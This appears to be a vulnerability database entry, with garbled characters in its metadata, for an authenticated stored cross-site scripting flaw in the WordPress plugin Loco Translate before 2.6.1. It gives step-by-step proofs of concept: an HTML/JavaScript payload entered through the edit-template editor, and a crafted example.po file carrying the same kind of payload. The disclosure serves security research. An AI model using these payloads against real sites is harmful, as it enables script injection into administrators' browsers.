Lucene search

K

Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting

πŸ—“οΈΒ 22 Mar 2022Β 00:00:00Reported byΒ Taurus OmarTypeΒ 
wpexploit
Β wpexploit
πŸ‘Β 66Β Views

Loco Translate Authenticated XSS via edit-template and example.p

Show more
Related
Code
## POC1: via (edit-template) 

1.) Got to Plugin Loco Translate
2.) Enter Plugins Options
3.) Enter Edit Template Any Plugin
4.) Add New Message 
5.) Edit Message
6.) Replace The Message With The Payload : ">'><details/open/ontoggle=alert('Yoho!')>
7.) Save
8.) Replicated


## POC2 via (example.po)

1.) Got to Plugin Loco Translate
2.) Enter Plugins Options Any Plugin
3.) Upload PO options
3.) Load example.po

## Example.po
msgid ""
msgstr ""
"Project-Id-Version: xss-tester\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2022-02-25 03:48+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: \n"
"Language: \n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Loco https://localise.biz/\n"
"X-Loco-Version: 2.5.8; wp-5.9.1\n"
"X-Domain: xss-tester"
msgid "xss-tester"
msgstr ""
msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr ""

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Mar 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.001
66
.json
Report